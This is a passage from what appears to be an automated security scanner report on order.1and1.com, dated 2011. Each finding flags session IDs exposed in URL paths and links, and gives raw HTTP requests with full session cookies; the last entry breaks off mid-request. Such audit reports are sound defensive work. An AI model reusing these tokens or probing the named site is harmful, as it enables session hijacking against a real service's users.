Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerProcessor?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.44. http://order.1and1.com/xml/order/FeatureServerRecovery

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerRecovery

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerRecovery;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerRecovery?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.45. http://order.1and1.com/xml/order/FeatureServerSsl

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerSsl

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerSsl;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerSsl?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.46. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerVpsOsLinux

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerVpsOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerVpsOsLinux?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.47. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerVpsOsWindows

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerVpsOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerVpsOsWindows?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.48. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingAsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingAsp;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingAsp?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.49. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingBlog

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:26 GMT; Path=/
ETag: a52fac593cbd71846d3039342fde5fda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.50. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingBlog

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:26 GMT; Path=/
ETag: a52fac593cbd71846d3039342fde5fda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureSite-buildingBlog&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureSite-buildingBlog&amp;page=switch&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureSite-buildingBlog&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingBlog&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.51. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingCgi;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingCgi?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.52. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCnba

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
